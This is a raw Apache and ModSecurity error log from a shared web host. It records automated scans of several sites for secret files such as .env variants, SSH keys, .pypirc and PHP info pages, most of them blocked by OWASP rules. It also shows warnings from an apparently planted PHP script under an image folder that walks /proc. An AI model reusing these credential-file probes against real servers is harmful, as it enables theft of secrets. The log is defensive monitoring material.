[Tue May 12 02:41:27.650735 2026] [security2:error] [pid 1730175:tid 1730178] [client 93.123.109.165:4200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJ3N3o6NvB9WXx5V-55gAAAAQE"]
[Tue May 12 02:41:27.650915 2026] [security2:error] [pid 1730175:tid 1730178] [client 93.123.109.165:4200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJ3N3o6NvB9WXx5V-55gAAAAQE"]
[Tue May 12 02:41:27.672811 2026] [security2:error] [pid 1730175:tid 1730178] [client 93.123.109.165:4200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.local"] [unique_id "agJ3N3o6NvB9WXx5V-55gQAAAQE"]
[Tue May 12 02:41:27.672932 2026] [security2:error] [pid 1730175:tid 1730178] [client 93.123.109.165:4200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.local"] [unique_id "agJ3N3o6NvB9WXx5V-55gQAAAQE"]
[Tue May 12 02:41:27.672981 2026] [:error] [pid 1707624:tid 1707691] [client 93.123.109.165:4312] File does not exist: /home/ofcrysta/public_html/php-info.php
[Tue May 12 02:41:27.673124 2026] [security2:error] [pid 1730175:tid 1730178] [client 93.123.109.165:4200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.local"] [unique_id "agJ3N3o6NvB9WXx5V-55gQAAAQE"]
[Tue May 12 02:41:27.701491 2026] [:error] [pid 1707624:tid 1707691] [client 93.123.109.165:4312] File does not exist: /home/ofcrysta/public_html/test.php
[Tue May 12 02:41:27.725072 2026] [security2:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJ3N1fdQaraX_prmqcepgAAABI"]
[Tue May 12 02:41:27.725195 2026] [security2:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJ3N1fdQaraX_prmqcepgAAABI"]
[Tue May 12 02:41:27.725245 2026] [:error] [pid 1695975:tid 1695984] [client 93.123.109.165:4224] File does not exist: /home/ofcrysta/public_html/php.php
[Tue May 12 02:41:27.725490 2026] [security2:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJ3N1fdQaraX_prmqcepgAAABI"]
[Tue May 12 02:41:27.752194 2026] [:error] [pid 1695975:tid 1695984] [client 93.123.109.165:4224] File does not exist: /home/ofcrysta/public_html/i.php
[Tue May 12 02:41:27.752542 2026] [security2:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJ3N1fdQaraX_prmqceqAAAABI"]
[Tue May 12 02:41:27.752667 2026] [security2:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJ3N1fdQaraX_prmqceqAAAABI"]
[Tue May 12 02:41:27.752850 2026] [security2:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJ3N1fdQaraX_prmqceqAAAABI"]
[Tue May 12 02:41:27.771890 2026] [security2:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/api/.env"] [unique_id "agJ3N1fdQaraX_prmqceqQAAABI"]
[Tue May 12 02:41:27.772004 2026] [security2:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/api/.env"] [unique_id "agJ3N1fdQaraX_prmqceqQAAABI"]
[Tue May 12 02:41:27.772192 2026] [security2:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/api/.env"] [unique_id "agJ3N1fdQaraX_prmqceqQAAABI"]
[Tue May 12 02:41:27.772460 2026] [:error] [pid 1695975:tid 1695984] [client 93.123.109.165:4224] File does not exist: /home/ofcrysta/public_html/p.php
[Tue May 12 02:41:27.791329 2026] [security2:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/api/.env"] [unique_id "agJ3N1fdQaraX_prmqceqgAAABI"]
[Tue May 12 02:41:27.791488 2026] [security2:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/api/.env"] [unique_id "agJ3N1fdQaraX_prmqceqgAAABI"]
[Tue May 12 02:41:27.791690 2026] [security2:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/api/.env"] [unique_id "agJ3N1fdQaraX_prmqceqgAAABI"]
[Tue May 12 02:41:27.792108 2026] [:error] [pid 1695975:tid 1695984] [client 93.123.109.165:4224] File does not exist: /home/ofcrysta/public_html/pi.php
[Tue May 12 02:41:27.868432 2026] [:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] File does not exist: /home/ofcrysta/public_html/infophp.php
[Tue May 12 02:41:27.887867 2026] [:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] File does not exist: /home/ofcrysta/public_html/sysinfo.php
[Tue May 12 02:41:27.907764 2026] [:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] File does not exist: /home/ofcrysta/public_html/server-info.php
[Tue May 12 02:41:27.928049 2026] [:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] File does not exist: /home/ofcrysta/public_html/server-status.php
[Tue May 12 02:41:46.010468 2026] [proxy_http:error] [pid 1730207:tid 1730228] (20014)Internal error (specific information not available): [client 85.121.126.219:53496] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 02:41:46.010494 2026] [proxy:error] [pid 1730207:tid 1730228] [client 85.121.126.219:53496] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/.env.old
[Tue May 12 02:41:46.012202 2026] [proxy_http:error] [pid 1707624:tid 1707706] (20014)Internal error (specific information not available): [client 85.121.126.219:53596] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 02:41:46.012652 2026] [proxy_http:error] [pid 1695975:tid 1695980] (20014)Internal error (specific information not available): [client 85.121.126.219:53436] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 02:41:46.014544 2026] [proxy_http:error] [pid 1730175:tid 1730200] (20014)Internal error (specific information not available): [client 85.121.126.219:53424] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 02:41:46.014567 2026] [proxy:error] [pid 1730175:tid 1730200] [client 85.121.126.219:53424] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/.env.example
[Tue May 12 02:41:46.011132 2026] [proxy_http:error] [pid 1691274:tid 1691286] (20014)Internal error (specific information not available): [client 85.121.126.219:53570] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 02:41:46.015668 2026] [proxy_http:error] [pid 1709071:tid 1709096] (20014)Internal error (specific information not available): [client 85.121.126.219:53468] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 02:41:46.015692 2026] [proxy:error] [pid 1709071:tid 1709096] [client 85.121.126.219:53468] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/.env.backup
[Tue May 12 02:41:46.012675 2026] [proxy:error] [pid 1695975:tid 1695980] [client 85.121.126.219:53436] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/.env.production
[Tue May 12 02:41:46.012226 2026] [proxy:error] [pid 1707624:tid 1707706] [client 85.121.126.219:53596] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/.ssh/id_dsa
[Tue May 12 02:41:46.015242 2026] [proxy:error] [pid 1691274:tid 1691286] [client 85.121.126.219:53570] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/public/.env
[Tue May 12 02:41:46.028485 2026] [proxy_http:error] [pid 1730207:tid 1730228] (20014)Internal error (specific information not available): [client 85.121.126.219:53496] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 02:41:46.028508 2026] [proxy:error] [pid 1730207:tid 1730228] [client 85.121.126.219:53496] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/502.shtml
[Tue May 12 02:41:46.029721 2026] [proxy_http:error] [pid 1695975:tid 1695987] (20014)Internal error (specific information not available): [client 85.121.126.219:53616] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 02:41:46.030042 2026] [proxy:error] [pid 1695975:tid 1695987] [client 85.121.126.219:53616] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/.pypirc
[Tue May 12 02:41:57.168892 2026] [proxy_http:error] [pid 1707624:tid 1707703] (20014)Internal error (specific information not available): [client 85.121.126.219:59134] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 02:41:57.168918 2026] [proxy:error] [pid 1707624:tid 1707703] [client 85.121.126.219:59134] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/settings.json
[Tue May 12 02:41:57.170784 2026] [proxy_http:error] [pid 1709071:tid 1709109] (20014)Internal error (specific information not available): [client 85.121.126.219:59260] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 02:41:57.170807 2026] [proxy:error] [pid 1709071:tid 1709109] [client 85.121.126.219:59260] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/app-config.json
[Tue May 12 02:41:57.180406 2026] [proxy_http:error] [pid 1691274:tid 1691294] (20014)Internal error (specific information not available): [client 85.121.126.219:59230] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 02:41:57.180433 2026] [proxy:error] [pid 1691274:tid 1691294] [client 85.121.126.219:59230] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/api/openapi.json
PHP Warning:  filesize(): stat failed for /proc/692/task/692/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/692/task/692/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/692/task/692/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/692/task/692/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/692/task/692/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/692/task/692/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174159/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174159/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174159/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174159/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174159/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174159/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:43:58.336273 2026] [security2:error] [pid 1709071:tid 1709096] [client 176.65.139.229:52480] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/app/.env"] [unique_id "agJ3zrvMumyrWMfSu7qptAAAAMk"]
[Tue May 12 02:43:58.336521 2026] [security2:error] [pid 1709071:tid 1709096] [client 176.65.139.229:52480] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/app/.env"] [unique_id "agJ3zrvMumyrWMfSu7qptAAAAMk"]
[Tue May 12 02:43:58.429264 2026] [security2:error] [pid 1709071:tid 1709096] [client 176.65.139.229:52480] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJ3zrvMumyrWMfSu7qptAAAAMk"]
[Tue May 12 02:44:08.699516 2026] [authz_core:error] [pid 1695975:tid 1695994] [client 47.128.125.61:63012] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/interactivity-api/error_log
PHP Warning:  filesize(): stat failed for /usr/share/man/man1/ex.1.gz in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/share/man/man1/ex.1.gz in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /usr/share/man/man1/rview.1.gz in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/share/man/man1/rview.1.gz in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /usr/share/man/man1/view.1.gz in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/share/man/man1/view.1.gz in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:44:25.988380 2026] [core:error] [pid 1707624:tid 1707694] [client 114.119.154.26:51067] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:44:25.992462 2026] [core:error] [pid 1707624:tid 1707694] [client 114.119.154.26:51067] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:44:45.740953 2026] [core:crit] [pid 1691274:tid 1691280] (13)Permission denied: [client 8.230.109.209:41476] AH00529: /home/krakouka/public_html/wordpress/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home/krakouka/public_html/wordpress/' is executable, referer: http://www.krakoukas.com/wordpress/
[Tue May 12 02:44:47.100604 2026] [core:crit] [pid 1709071:tid 1709099] (13)Permission denied: [client 8.230.109.209:41480] AH00529: /home/krakouka/public_html/wordpress/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home/krakouka/public_html/wordpress/' is executable, referer: https://www.krakoukas.com/wordpress/
[Tue May 12 02:45:24.376394 2026] [security2:error] [pid 1707624:tid 1707688] [client 150.109.12.46:45548] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agJ4JLOxS7i6i_mT2NLIVAAAAEY"]
[Tue May 12 02:45:46.825563 2026] [security2:error] [pid 1730207:tid 1730217] [client 98.82.214.73:12163] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.phpurl=https:/heylink.me/Kingslot96.com"] [unique_id "agJ4Ojue9Sp-pIv_Bb6QgQAAAUg"]
[Tue May 12 02:45:46.825933 2026] [security2:error] [pid 1730207:tid 1730217] [client 98.82.214.73:12163] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.phpurl=https:/heylink.me/Kingslot96.com"] [unique_id "agJ4Ojue9Sp-pIv_Bb6QgQAAAUg"]
[Tue May 12 02:45:46.826176 2026] [security2:error] [pid 1730207:tid 1730217] [client 98.82.214.73:12163] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.phpurl=https:/heylink.me/Kingslot96.com"] [unique_id "agJ4Ojue9Sp-pIv_Bb6QgQAAAUg"]
[Tue May 12 02:45:54.635447 2026] [security2:error] [pid 1730207:tid 1730233] [client 43.157.50.58:58270] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "missmandarine.com"] [uri "/"] [unique_id "agJ4Qjue9Sp-pIv_Bb6QhAAAAVg"], referer: http://missmandarine.com
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704681/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704681/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704681/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704681/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704681/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704681/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:46:22.508376 2026] [authz_core:error] [pid 1695975:tid 1695983] [client 17.22.237.23:51834] AH01630: client denied by server configuration: /home/jeanboya/public_html/wp-includes/Requests/src/error_log
[Tue May 12 02:46:38.316095 2026] [ssl:error] [pid 1730207:tid 1730217] (EAI 2)Name or service not known: [client 46.105.40.140:21673] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
